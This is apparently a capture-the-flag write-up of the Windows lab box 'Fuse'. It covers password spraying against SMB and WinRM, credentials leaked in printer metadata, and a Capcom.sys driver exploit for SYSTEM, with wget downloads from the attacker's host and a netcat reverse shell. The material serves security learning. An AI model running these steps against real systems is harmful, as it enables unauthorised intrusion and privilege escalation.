Fuse was a box that felt realistic to me since printer software often is a nice way into the company. Using the content and log information on the Papercut website to make a custom wordlist and grab root by exploiting the CAPCOM vulnerability.
[0x1] Reconnaissance & Enumeration
First, we start with a Nmap scan to gain some insights into the active ports and services. There are a lot of open ports, which is not uncommon for a Microsoft Windows box.
nmap -sV -sC -p- -oA fuse-allports fuse.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-18 13:04 BST
Nmap scan report for fuse.htb (10.10.10.193)
Host is up (0.019s latency).
rDNS record for 10.10.10.193: fuse
Not shown: 65515 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-07-18 12:23:53Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49675/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=7/18%Time=5F12E5A8%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h37m59s, deviation: 4h02m32s, median: 17m57s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Fuse
| NetBIOS computer name: FUSE\x00
| Domain name: fabricorp.local
| Forest name: fabricorp.local
| FQDN: Fuse.fabricorp.local
|_ System time: 2020-07-18T05:26:14-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-07-18T12:26:10
|_ start_date: 2020-07-18T12:20:07
Checking port 80 offered a website that could not be loaded. The hostname did look interesting but cannot be resolved.
As there a no other machines for this lab, my guess is that it can be fixed with an extra addition to the host file.
nano /etc/hosts
10.10.10.193 fuse fuse.htb fuse.fabricorp.local
And it worked. I now have a working website for Papercut, the Print logger software used by this box.
After doing some extensive enumeration to find more information for my foothold, I stumbled upon the printer logs. They include usernames and other information like document names and more. After a nudge from a fellow hacker, I created a user list manually and automated the and custom wordlist from the content on the website.
Using the cewl command I created the custom wordlist from the url.
cewl -d 5 -m 4 http://fuse.fabricorp.local/papercut/logs/html -w custom_wordlist_fuse.txt --with-numbers
[0x2] Initial Foothold
Since I had the feeling I should now have enough to start and see if I could get the initial foothold it was time to fire up Metasploit. I like the SMB Login scanner in Metasploit to see if one of their users has a password that is in my custom wordlist.
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\
=[ metasploit v5.0.94-dev ]
+ -- --=[ 2034 exploits - 1103 auxiliary - 344 post ]
+ -- --=[ 566 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: View missing module options with show missing
[*] Starting persistent handler(s)...
msf5 auxiliary(scanner/smb/smb_login) > show options
Module options (auxiliary/scanner/smb/smb_login):
Name Current Setting Required Description
---- --------------- -------- -----------
ABORT_ON_LOCKOUT false yes Abort the run when an account lockout is detected
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DETECT_ANY_AUTH false no Enable detection of systems accepting any authentication
DETECT_ANY_DOMAIN false no Detect if domain is required for the specified user
PASS_FILE /home/user/Documents/boxes/fuse/custom_wordlist_fuse.txt no File containing passwords, one per line
PRESERVE_DOMAINS true no Respect a username that contains a domain name.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RECORD_GUEST false no Record guest-privileged random logins to the database
RHOSTS 10.10.10.193 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /home/user/Documents/boxes/fuse/users.txt no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf5 auxiliary(scanner/smb/smb_login) > run
With all the options configured, I run the SMB Login with the username list and the custom wordlist.
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\tlavel:mountain',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\tlavel:tape',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\tlavel:request',
[+] 10.10.10.193:445 - 10.10.10.193:445 - Success: '.\tlavel:Fabricorp01'
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\bhult:request',
[+] 10.10.10.193:445 - 10.10.10.193:445 - Success: '.\bhult:Fabricorp01'
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\sthompson:Print',
[-] 10.10.10.193:445 - 10.10.10.193:445 - Failed: '.\sthompson:2020',
So I have some credentials to try since they are valid for SMB login. I tried to login direct using SMBclient, but I encountered a new phenomenon. The password needs to be changed. Nice!
smbclient -L fuse.htb -U tlavel
Enter WORKGROUP\tlavel's password:
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE
smbclient -L fuse.htb -U bhult
Enter WORKGROUP\bhult's password:
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE
I found out that using smbpasswd you can change your password. So let’s try and change the password of ‘tlavel’ to something else.
smbpasswd -r fuse.htb -U tlavel
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user tlavel on fuse.htb.
With the changed password, I rechecked the smbclient login to see if it gives any valid response. I got a nice directory listing, so the credentials work. After a while, the password is reset again and I needed to repeat the process.
smbclient -L fuse.htb -U tlavel
Enter WORKGROUP\tlavel's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
HP-MFT01 Printer HP-MFT01
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
print$ Disk Printer Drivers
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
After a while, I tried to run rpcclient to see if that gave me some more information for further steps into getting the root flag. It gave me some extra usernames which were not in my username file yet.
rpcclient $> enumdomusers user:[Administrator] rid:[0x1f4] user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3] rpcclient $>
Since this box is all about printing, it sounds logical to check for any printers on the box. The enumerateprinters command within rpcclient shows one printer, but it also gives a scan2docs password named: $fab@s3Rv1ce$1)
rpcclient $> enumprinters flags:[0x800000] name:[\\10.10.10.193\HP-MFT01] description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)] comment:[] rpcclient $>
Maybe the newfound password is also present on one of the accounts I have gathered in my username file. To check this easily, I use the WinRM login within Metasploit. It works out and I have a new working set of credentials for svc-print.
msf5 auxiliary(scanner/winrm/winrm_login) > set PASSWORD '$fab@s3Rv1ce$1'
PASSWORD => $fab@s3Rv1ce$1
msf5 auxiliary(scanner/winrm/winrm_login) > set USER_FILE users
USER_FILE => users
msf5 auxiliary(scanner/winrm/winrm_login) > set RHOSTS 10.10.10.193
RHOSTS => 10.10.10.193
msf5 auxiliary(scanner/winrm/winrm_login) >
msf5 auxiliary(scanner/winrm/winrm_login) > run
[!] No active DB -- Credential data will not be saved!
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\DefaultAccount:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\Administrator:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\krbtgt:$fab@s3Rv1ce$1 (Incorrect: )
...
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\astein:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\dmuir:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\svc-scan:$fab@s3Rv1ce$1 (Incorrect: )
[+] 10.10.10.193:5985 - Login Successful: WORKSTATION\svc-print:$fab@s3Rv1ce$1
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\Guest:$fab@s3Rv1ce$1 (Incorrect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
It is possible to login using Win-RM and get a shell as this newfound user.
evil-winrm -u svc-print -p '$fab@s3Rv1ce$1' -i fuse.htb
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-print\Documents> whoami
fabricorp\svc-print
[0x3] Path to User flag
After the inital foothold it did took long to grab the user flag. It was in the homedirectory of svc-print. Time to root!
*Evil-WinRM* PS C:\Users\svc-print\desktop> dir
Directory: C:\Users\svc-print\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 7/18/2020 5:20 AM 34 user.txt
*Evil-WinRM* PS C:\Users\svc-print\desktop> type user.txt
cac5efadf90e05b79ea755f51d095197
[0x4] Path to Root flag
Since the user has permission to log in using Win-RM, it is always good practice to see what permission the current user has on the box. In the Privileges Information, the SeLoadDriverPrivilege is Enabled, which indicates that the user has permissions to load drivers into the Operating System.
*Evil-WinRM* PS C:\Users\svc-print\desktop> whoami /all
clip...
..
...]
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
I found an exploit for abusing SeLoadPrivieleges for Privilege Escalation. It consists of loading a driver and then use a signed driver for privilege escalation. To do this, I need to download the exploit and adjust the Proof of Concept code.
// Launches a command shell process
static bool LaunchShell()
{
TCHAR CommandLine[] = TEXT("c:\\windows\\system32\\cmd.exe");
PROCESS_INFORMATION ProcessInfo;
STARTUPINFO StartupInfo = { sizeof(StartupInfo) };
if (!CreateProcess(CommandLine, CommandLine, nullptr, nullptr, FALSE,
CREATE_NEW_CONSOLE, nullptr, nullptr, &StartupInfo,
&ProcessInfo))
{
return false;
}
CloseHandle(ProcessInfo.hThread);
CloseHandle(ProcessInfo.hProcess);
return true;
I adjusted the code to launch nc.bat from within c:\temp\d0p4m1n3. In the batch file, I have created a Netcat connection to my own machine. After the adjustment, I compiled it to an executable. The driver can be downloaded and needs no alteration.
// Launches a command shell process
static bool LaunchShell()
{
TCHAR CommandLine[] = TEXT("c:\\temp\\d0p4m1n3\\nc.bat");
PROCESS_INFORMATION ProcessInfo;
STARTUPINFO StartupInfo = { sizeof(StartupInfo) };
if (!CreateProcess(CommandLine, CommandLine, nullptr, nullptr, FALSE,
CREATE_NEW_CONSOLE, nullptr, nullptr, &StartupInfo,
&ProcessInfo))
{
return false;
}
CloseHandle(ProcessInfo.hThread);
CloseHandle(ProcessInfo.hProcess);
return true;
Since the files have to be downloaded from my machine, I start a Python webserver to serve them.
python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
Using wgtet the files are transfered. Not the most flashy way, but it does the trick
wget http://10.10.14.64:8080/ExploitCapcom_d0p4m1n3.exe -o ExploitCapcom_d0p4m1n3.exe
wget http://10.10.14.64:8080/Capcom.sys -o capcom.sys
wget http://10.10.14.64:8080/nc.bat -o nc.bat
wget http://10.10.14.64:8080/nc.exe -o nc.exe
wget http://10.10.14.64:8080/EOPLOADDRIVER.exe -o EOPLOADDRIVER.exe
All the files are present in c:\temp\d0p4m1n3, including the batch file that will be started by the exploit.
ls -sla
total 1968
0 drwxr-xr-x 1 user user 146 Jul 18 17:01 .
0 drwxr-xr-x 1 user user 30 Jul 18 15:56 ..
12 -rw-r--r-- 1 user user 10576 Jul 18 16:10 Capcom.sys
16 -rw-r--r-- 1 user user 15360 Jul 18 16:10 EOPLOADDRIVER.exe
1848 -rw-r--r-- 1 user user 1890816 Jul 18 16:28 ExploitCapcom_d0p4m1n3.exe
48 -rw-r--r-- 1 user user 45272 Sep 16 2011 nc64.exe
4 -rw-r--r-- 1 user user 51 Jul 18 16:26 nc.bat
40 -rw-r--r-- 1 user user 38616 Sep 16 2011 nc.exe
Start the listener so that the incoming connection from the exploit can be grabbed.
rlwrap netcat -lvnp 1337
The exploit consists of two phases. The first one load the capcom.sys driver into the machine so the second stage can proceed and exploit a signed driver.
*Evil-WinRM* PS C:\temp\d0p4m1n3> .\EOPLOADDRIVER.exe System\CurrentControlSet\MyService C:\temp\d0p4m1n3\capcom.sys
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService
NTSTATUS: 00000000, WinError: 0
Now it is time to run the compiled executable and escalate my privilege to SYSTEM.
*Evil-WinRM* PS C:\temp\d0p4m1n3> .\ExploitCapcom_d0p4m1n3.exe
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000064
[*] Shellcode was placed at 0000024882730008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this program
The Netcat listener gets the inbound connection and provides me with a shell as SYSTEM.
listening on [any] 1337 ...
connect to [10.10.14.64] from (UNKNOWN) [10.10.10.193] 51768
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\temp\d0p4m1n3>whoami
whoami
nt authority\system
The last thing I need is that flag, well there we have it 🙂 Officially rooted!
C:\temp\d0p4m1n3>type c:\users\administrator\desktop\root.txt
e4206521bad2de4bc1fee6f034c8944f
[box type=”warning” align=”” class=”” width=””]All information in this post is for educational use only! Do not use it at others when you do not have explicit approval to do so. I am not responsible for your actions. Using this knowledge for illegal activities could land you in jail![/box]
Add comment